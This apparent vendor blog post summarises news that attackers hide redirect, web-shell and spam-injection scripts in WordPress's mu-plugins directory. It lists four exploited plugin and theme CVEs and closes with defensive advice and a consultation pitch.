In a concerning trend for website security, hackers are exploiting the mu-plugins directory in WordPress to inject malicious code, redirect users to spam sites, and hijack images. This tactic allows them to maintain persistent access to compromised sites while evading detection.

Key Takeaways

• Hackers are using the mu-plugins directory to conceal malware.

• Three types of malicious PHP scripts have been identified.

• Vulnerable plugins and themes are common entry points for attacks.

• Regular updates and security audits are essential for WordPress site owners.

Understanding mu-Plugins

The term "mu-plugins" stands for must-use plugins, which are automatically executed by WordPress without requiring activation through the admin dashboard. This feature makes mu-plugins an attractive target for cybercriminals, as they can hide their malicious code from standard plugin interfaces, making it less likely for site owners to notice during routine checks.

Types of Malicious Code Found

Recent analyses have uncovered three distinct types of rogue PHP scripts within the mu-plugins directory:

1. Redirect Script: Located in wp-content/mu-plugins/redirect.php, this script redirects visitors to external malicious websites, often disguised as a web browser update to trick users into downloading malware.

2. Web Shell Functionality: The script in wp-content/mu-plugins/index.php allows attackers to execute arbitrary code by downloading remote PHP scripts, providing them with extensive control over the compromised site.

3. Spam Injection: The wp-content/mu-plugins/custom-js-loader.php script injects unwanted spam content into the website, replacing images with explicit content and hijacking outbound links to promote scams or manipulate SEO rankings.

Current Threat Landscape

The exploitation of WordPress sites has escalated, with hackers using compromised platforms to deploy malicious JavaScript. This can redirect users to unwanted domains or act as skimmers to capture sensitive financial information during transactions.

The tactics employed by these threat actors include:

• ClickFix Attacks: Using infected sites to trick visitors into executing malicious PowerShell commands under the guise of CAPTCHA verifications.

• Data Theft: Deploying malware like Lumma Stealer to harvest sensitive information from users.

Common Vulnerabilities

While the exact methods of breach remain unclear, several common vulnerabilities have been identified as potential entry points for attackers:

• Vulnerable Plugins/Themes: Outdated or poorly coded plugins and themes can provide easy access for hackers.

• Compromised Admin Credentials: Weak passwords or stolen credentials can lead to unauthorized access.

• Server Misconfigurations: Improperly configured servers can expose sites to various attacks.

Recent Vulnerabilities to Watch

A report from Patchstack highlights four critical vulnerabilities that have been actively exploited this year:

1. CVE-2024-27956: An unauthenticated SQL execution vulnerability in the WordPress Automatic Plugin.

2. CVE-2024-25600: A remote code execution vulnerability in the Bricks theme.

3. CVE-2024-8353: An unauthenticated PHP object injection vulnerability in the GiveWP plugin.

4. CVE-2024-4345: An arbitrary file upload vulnerability in Startklar Elementor Addons.

Best Practices for WordPress Security

To mitigate the risks associated with these threats, WordPress site owners should adopt the following best practices:

• Regular Updates: Keep all plugins and themes up to date to patch known vulnerabilities.

• Routine Audits: Regularly check for malware and suspicious code within the site.

• Strong Passwords: Enforce strong password policies for all user accounts.

• Web Application Firewalls: Implement firewalls to block malicious requests and prevent code injections.

By staying vigilant and proactive, WordPress site owners can significantly reduce the risk of falling victim to these malicious attacks. As cybercriminals continue to adapt their strategies, awareness and education remain crucial in combating these threats. Cybersecurity is critical. BetterWorld Technology offers cutting-edge solutions to combat evolving threats while driving innovation. Protect your business with confidence—contact us today for a consultation!

Sources

• Hackers Exploit WordPress mu-Plugins to Inject Spam and Hijack Site Images, The Hacker News.